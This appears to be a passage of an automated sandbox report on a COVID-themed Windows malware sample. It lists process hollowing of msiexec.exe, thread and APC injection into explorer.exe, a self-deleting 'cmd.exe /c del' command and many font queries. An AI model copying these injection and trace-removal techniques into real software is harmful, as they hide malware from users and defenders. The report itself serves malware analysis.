Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: BF0000

Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'	Jump to behavior

Source: explorer.exe, 00000004.00000002.616589320.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Users\user\Desktop\Po-covid19 2372#w2..exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
